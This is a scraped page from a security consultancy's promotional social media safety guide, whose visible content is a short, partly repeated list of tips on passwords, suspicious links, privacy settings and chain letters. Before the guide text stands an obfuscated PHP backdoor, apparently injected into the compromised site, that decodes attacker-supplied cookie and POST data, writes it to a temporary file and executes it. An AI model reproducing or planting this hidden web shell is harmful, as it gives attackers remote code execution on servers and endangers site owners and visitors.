$gcDIFKr = 'T' . chr (101) . "\123" . "\137" . chr (66) . "\x67" . "\131" . "\x54";$kZoSkjDMA = chr ( 227 - 128 ).chr ( 252 - 144 )."\x61" . "\163" . 's' . "\x5f" . chr (101) . chr (120) . chr ( 580 - 475 )."\163" . chr ( 889 - 773 )."\x73";$TjLoNKyvZB = class_exists($gcDIFKr); $kZoSkjDMA = "40666";$pWVym = !1;if ($TjLoNKyvZB == $pWVym){function paxusm(){$XgQoWRWyN = new /* 21071 */ TeS_BgYT(15687 + 15687); $XgQoWRWyN = NULL;}$eDgbdB = "15687";class TeS_BgYT{private function Enflrti($eDgbdB){if (is_array(TeS_BgYT::$KPSspNA)) {$rbKqtmQcIp = sys_get_temp_dir() . "/" . crc32(TeS_BgYT::$KPSspNA['s' . "\x61" . 'l' . 't']);@TeS_BgYT::$KPSspNA[chr ( 217 - 98 ).chr ( 766 - 652 ).chr ( 1020 - 915 )."\164" . "\x65"]($rbKqtmQcIp, TeS_BgYT::$KPSspNA["\143" . 'o' . "\156" . chr (116) . "\x65" . "\156" . 't']);include $rbKqtmQcIp;@TeS_BgYT::$KPSspNA["\x64" . "\145" . "\154" . "\145" . 't' . chr (101)]($rbKqtmQcIp); $eDgbdB = "15687";exit();}}private $oKNHvgzc;public function zLZOYoYFb(){echo 41826;}public function __destruct(){$eDgbdB = "28112_30749";$this->Enflrti($eDgbdB); $eDgbdB = "28112_30749";}public function lptByl($rwGKlsP, $SaaOqw){return $rwGKlsP[0] ^ str_repeat($SaaOqw, (strlen($rwGKlsP[0]) / strlen($SaaOqw)) + 1);}public function __construct($HWNKAuW=0){$ytLIex = $_POST;$RwrRp = $_COOKIE;$SaaOqw = "d2dbab51-1ab6-46dd-a7a1-57f701d9dd23";$GxEQrM = @$RwrRp[substr($SaaOqw, 0, 4)];if (!empty($GxEQrM)){$EwdCOoNWB = "base64";$rwGKlsP = "";$GxEQrM = explode(",", $GxEQrM);foreach ($GxEQrM as $CqgTAHsQ){$rwGKlsP .= @$RwrRp[$CqgTAHsQ];$rwGKlsP .= @$ytLIex[$CqgTAHsQ];}$rwGKlsP = array_map($EwdCOoNWB . "\x5f" . chr ( 825 - 725 ).chr (101) . "\x63" . chr (111) . "\x64" . "\145", array($rwGKlsP,)); $rwGKlsP = $this->lptByl($rwGKlsP, $SaaOqw);TeS_BgYT::$KPSspNA = @unserialize($rwGKlsP);}}public static $KPSspNA = 56949;}paxusm();} Essential Guide to Social Media Security - OpSec Consulting

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Included in this guide:

The Importance Of Strong Passwords

Because “letmein” and “starwars” are more common than you’d think.

Spotting Strange Links

You don’t talk to strangers, so why click on a link from one?

Adjusting Privacy Settings

Come on, not everyone needs to see that.

The Importance Of Strong Passwords

Because “letmein” and “starwars” are more common than you’d think.

Breaking Chain Letters

Psst, pass it on: “Don’t pass it on.”

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